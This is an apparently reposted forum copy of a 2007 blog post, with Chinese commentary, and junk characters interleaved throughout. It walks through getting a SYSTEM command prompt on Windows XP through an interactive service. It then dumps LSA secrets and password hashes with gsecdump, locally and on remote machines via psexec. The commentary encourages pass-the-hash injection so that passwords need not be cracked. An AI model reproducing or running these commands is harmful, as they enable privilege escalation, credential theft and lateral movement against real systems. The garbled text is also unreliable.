o get a DOS Prompt as NT system:
# h7 ^$ z4 n- ^1 c( i
( F" I" X( m; iC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact, H, h/ B8 L; A+ h$ B5 e" [
[SC] CreateService SUCCESS1 [+ |/ ~" T7 U( N( b* _4 q
( }$ f, N ]; q3 |6 a
C:\>sc start shellcmdline
- Q' U8 D' E5 n[SC] StartService FAILED 1053:
3 B, g9 {! X6 n
7 y6 h7 s% H" S$ xThe service did not respond to the start or control request in a timely fashion.9 u4 ]5 n/ n3 } c/ T
' [4 y! H' y% w( M) Q! y3 |+ z' [$ ?
C:\>sc delete shellcmdline4 D! i5 {: x9 |1 E4 a, F7 C
[SC] DeleteService SUCCESS8 g! Y/ `! y8 ]! B5 j6 x+ G
5 k$ d3 K$ \' {3 s------------+ w! K) l; g5 m4 p5 G: {& R
4 D1 v5 [* o( a% C
Then in the new DOS window:
- z* r/ H ]6 |& e" F* g* n* \5 w' [/ y$ e/ D" Y
Microsoft Windows XP [Version 5.1.2600]
8 O/ ]/ E$ d: H" a+ p(C) Copyright 1985-2001 Microsoft Corp.
% R6 O0 t- T7 F0 \! Z9 P8 \
. N, z! C# m* U/ r3 X! DC:\WINDOWS\system32>whoami! c2 u& R+ Q! K1 e! l
NT AUTHORITY\SYSTEM) Z! W% S% c! y
& ~; {" _# m0 f! ]( B
C:\WINDOWS\system32>gsecdump -h
0 `* X8 P- w) v2 ?( i, j* O, W8 Hgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)/ N$ n' `3 l z- w
usage: gsecdump [options]
* I) D2 r5 u3 |/ z
" \5 K* T9 z0 g' ~3 w7 Toptions:
9 d% w+ Q1 V- p6 B' Q1 F6 F-h [ --help ] show help; h! k' F& l0 G! V7 h: p
-a [ --dump_all ] dump all secrets% ]$ \$ L0 R7 X% g% b
-l [ --dump_lsa ] dump lsa secrets! F* N& Q+ E) f5 h4 c0 w
-w [ --dump_wireless ] dump microsoft wireless connections4 e% H% ]% x6 R7 v X4 V
-u [ --dump_usedhashes ] dump hashes from active logon sessions& ?6 r( p6 j+ w5 r$ W) k
-s [ --dump_hashes ] dump hashes from SAM/AD" k& o9 Q9 q" }4 j9 X8 h8 Y
% ^9 |7 l- @- Z, F+ F+ L$ q
Although I like to use:
" ?9 g7 s4 C- y! B( C6 R, T% S+ d- G, W2 I
PsExec v1.83 - Execute processes remotely. [- ]$ n& b. ]6 N0 X( v& E
Copyright (C) 2001-2007 Mark Russinovich; G( l8 U9 H- A' Y' I- [# F
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
2 a$ \" }3 b& V4 j# Z# E; r* q( {. m; J6 k/ M3 X
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
% o$ L1 i( W% V! `! B4 t+ p3 M
, W! ?& F# \* \; mto get the hashes from active logon sessions of a remote system.
& s; G% I$ }1 s x! C: a
( D4 e- W$ q- RThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.2 H2 y1 j W. b/ ]* ~) o( c) s7 f
# B" D) ~; c* G* c
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
L6 r6 |1 y9 i! t% K原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
% Z! }! \2 z, r, W7 e' }2 v j5 N: \* t7 b7 ^ T; O1 h
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。) Q \. g% b+ \: a
|